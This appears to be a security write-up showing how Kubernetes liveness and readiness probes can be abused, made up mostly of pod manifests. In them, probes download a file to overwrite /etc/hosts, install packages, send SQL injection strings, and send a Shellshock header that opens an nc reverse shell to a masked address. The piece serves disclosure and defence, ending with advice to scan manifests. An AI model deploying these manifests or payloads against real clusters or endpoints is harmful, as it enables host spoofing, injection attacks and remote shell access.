Exploiting applications using liveness probes in Kubernetes
Introduction
Startup, readiness, and liveness probes are well described in the Kubernetes documentation. The kubelet uses the probes defined in the pod manifest to verify whether a pod is still booting, ready to accept traffic, and still alive. It is the kubelet that actually executes the probes, not the pod itself.
Probes can be executed in different ways, including:
- httpGet
- exec
The problems described here were classified as 'as designed' by the reviewers, whose position is that you should only download container images from a trusted source.
The examples below show that trusted sources of container images will not solve the problem, and neither will image scanning: the malicious behaviour lives in the manifest, not in the image.
To prevent such an attack, it is mandatory to scan the Kubernetes pod and deployment manifests rigorously before deploying them (and not to use any pre-canned examples :-)).
Example 1: Overwriting files on the pod filesystem
This example overwrites the pod's /etc/hosts file to spoof hostnames.
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  labels:
    test: liveness
  name: liveness-exec15
spec:
  containers:
  - name: liveness
    image: xxradar/hackon
    args:
    - /bin/sh
    - -c
    - touch /tmp/healthy;sleep 600
    livenessProbe:
      exec:
        command:
        - curl
        - www.xxxxx.com/host.txt
        - -o
        - /etc/hosts
      initialDelaySeconds: 5
      periodSeconds: 5
EOF
Example 2: Installing applications in a pod at deployment time
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  labels:
    test: liveness
  name: liveness-exec39
spec:
  containers:
  - name: liveness
    image: ubuntu
    args:
    - /bin/sh
    - -c
    - touch /tmp/healthy;sleep 600
    readinessProbe:
      exec:
        command:
        - apt-get
        - update
      initialDelaySeconds: 5
      periodSeconds: 10
      timeoutSeconds: 60
    livenessProbe:
      exec:
        command:
        - apt-get
        - install
        - -y
        - curl
      initialDelaySeconds: 60
      periodSeconds: 100
      timeoutSeconds: 60
EOF
Example 3: Attacking http(s) endpoints using SQL injection, XSS, …
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  labels:
    test: liveness
  name: liveness3
spec:
  containers:
  - name: liveness
    image: ubuntu
    args:
    - /bin/sh
    - -c
    - touch /tmp/healthy;sleep 600
    livenessProbe:
      httpGet:
        host: www.xxxx.com
        path: /?'OR 1=1--
        port: 8080
        httpHeaders:
        - name: User-Agent
          value: xxxxxxxxx
EOF
Example 4: Attacking http(s) endpoints using Shellshock
apiVersion: v1
kind: Pod
metadata:
  name: radarhack-pod3
  labels:
    pod: radarhack
spec:
  containers:
  - name: radarhack
    image: docker.io/xxradar/naxsi5
    ports:
    - containerPort: 80
    livenessProbe:
      httpGet:
        host: www.xxxxx.com
        path: /index.html?test=' or 1=1--
        port: 8080
        httpHeaders:
        - name: Custom-Header
          value: Awesome
        - name: X-Frame-Options
          value: () { :;};echo;/bin/nc -e /bin/bash 1.1.x.x 443
      initialDelaySeconds: 3
      periodSeconds: 3
Conclusion
Much has been written on securely deploying applications on Kubernetes. Keep in mind that every aspect needs full attention, and that writing and generating Kubernetes manifests is also developing code: a manifest deserves the same review and scanning as the image it deploys.